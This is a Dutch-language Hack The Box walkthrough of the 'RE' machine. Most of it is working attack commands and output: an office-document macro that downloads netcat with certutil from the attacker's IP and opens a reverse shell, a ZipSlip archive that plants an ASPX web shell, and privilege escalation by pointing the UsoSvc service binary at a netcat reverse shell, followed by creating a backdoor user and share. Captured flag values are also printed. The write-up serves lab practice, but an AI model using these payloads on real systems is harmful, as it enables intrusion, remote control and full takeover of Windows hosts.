Zoals altijd eerst een nmap scan
root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining) Nmap scan report for 10.10.10.144 Host is up (0.029s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds
Ik vond de shares met behulp van
root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p '' [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.144... [+] IP: 10.10.10.144:445 Name: reblog.htb Disk Permissions ---- ----------- IPC$ READ ONLY malware_dropbox READ ONLY
vervolgens las ik de reblog.htb, en heb daarna een malicious odt file geupload, larer bleek dat het een ods file moest zijn.
In metasploit is er een exploit die zou moeten werken :
exploit/multi/misc/openoffice_document_macro
We hernoemen het verkregen bestand naar zip, en bewerken deze door de payload te vervangen door :
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic"> Sub OnLoad Shell("certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe") Shell("C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe") End Sub </script:module>
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 02:19:02 2020 .. D 0 Wed Jan 22 02:19:02 2020 8247551 blocks of size 4096. 4294559 blocks available smb: \> put puckiestyle.odt putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s) smb: \>
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 04:59:00 2020 .. D 0 Wed Jan 22 04:59:00 2020 8247551 blocks of size 4096. 4294527 blocks available smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s) smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s) smb: \>
hier is mijn gebruikte odt/ods bestand https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip
root@kali:~# rlwrap nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\LibreOffice\program>whoami whoami re\luke C:\Program Files\LibreOffice\program> c:\Users\luke\Desktop>type user.txt type user.txt FE41736F5B9311E48E48B520D9F384D3
.
ZipSlip archie maken
Ik maakt een zipslip, door eerst in mijn kali box folders aan te maken \inetpub\wwwroot\blog
vervolgens copieerde ik hier puckieshell.ods hierheen
toen maakt ik het zipslip met
root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx ( deflated 75%)
upload vervolgens dit zipslip.zip naar ods folder for analyse door vulerable WinRAR
c:\Users\luke\Documents>dir dir Volume in drive C has no label. Volume Serial Number is 4638-2C29 Directory of c:\Users\luke\Documents 06/18/2019 01:05 PM <DIR> . 06/18/2019 01:05 PM <DIR> .. 01/22/2020 03:28 AM <DIR> malware_dropbox 01/22/2020 03:28 AM <DIR> malware_process 01/22/2020 03:46 AM <DIR> ods 06/18/2019 09:30 PM 1,096 ods.yara 06/18/2019 09:33 PM 1,783 process_samples.ps1 03/13/2019 05:47 PM 1,485,312 yara64.exe 3 File(s) 1,488,191 bytes 5 Dir(s) 17,559,576,576 bytes free c:\Users\luke\Documents>whoami whoami re\luke c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" **** Online **** 0000 ... 322f CertUtil: -URLCache command completed successfully.
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -
`vervolgens opende ik de browser en ging naar de shell
Ik maakte eerst een folder c:\temp om daar mijn bestanden neer te zetten. En vervolgens starte ik een netcat sessie
root@kali:~/htb/re# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\blog>whoami whoami iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt Accesschk v6.12 - Reports effective permissions for securable objects Copyright (C) 2006-2017 Mark Russinovich Sysinternals - www.sysinternals.com
vervolgens ontdekte ik in accesscheck.txt dat NT AUTHORITY\SERVICE ook RW access had op UsoSvc
c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt -knip- UserManager Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS UsoSvc Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW NT AUTHORITY\SERVICE SERVICE_ALL_ACCESS VaultSvc
Voor PrivEsc heb ik de usosvc gebruikt. ( eerst current bin path controleren, en daarna aanpassen, en als laatste de usosvc service stoppen en starten )
C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd
C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.
More help is available by typing NET HELPMSG 3521.
C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\inetpub\wwwroot\blog>
root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.
C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.
C:\Windows\system32>z:
z:
Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29
Directory of Z:\
04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free
Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D
Z:\>
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"
Auteur : Puckiestyle